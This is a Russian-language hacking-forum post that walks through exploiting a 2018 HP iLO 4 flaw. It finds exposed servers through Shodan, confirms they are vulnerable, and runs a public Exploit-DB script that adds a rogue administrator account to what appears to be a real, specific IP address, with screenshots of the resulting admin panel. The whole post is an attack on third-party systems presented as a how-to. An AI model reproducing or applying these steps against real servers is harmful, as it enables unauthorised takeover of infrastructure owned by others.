• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Shodan: HP iLO RCE

netcat

(L3) cache
Забанен
Регистрация
26.07.2019
Сообщения
158
Реакции
448
Пожалуйста, обратите внимание, что пользователь заблокирован
[Shodan: HP iLO RCE]


Вспомнилась старая уязвимость 2018 года, связанная с системой управления серверами HP.
В Сети в открытом доступе опубликован эксплоит для серьезной уязвимости в серверах Hewlett Packard Integrated Lights-Out 4 (HP iLO 4)
подробнее тут | и здесь
Был взят эксплойт с ресурса https://www.exploit-db.com/exploits/44005 HPE iLO 4 < 2.53 – Add New Administrator User
Сделав запрос в шодане получаем сервера с iLO v2.5

Код:
iLO-Firmware: 2.50
image-17.png



image-18.png


iLO-Firmware: 2.50









image-19.png


Код:
При проверке с ключом -t . видим список администраторов

[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator
[+] Account name: User Account Username: Black

запускаем эксплойт с ключами -e -u shodan -p shodan@1234Shodan 173.13.58.217:8889



image-21-1024x213.png

авторизация


image-20-1024x569.png


панель управления



так же хочется добавить аналог шодана FOFA
image-22.png
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх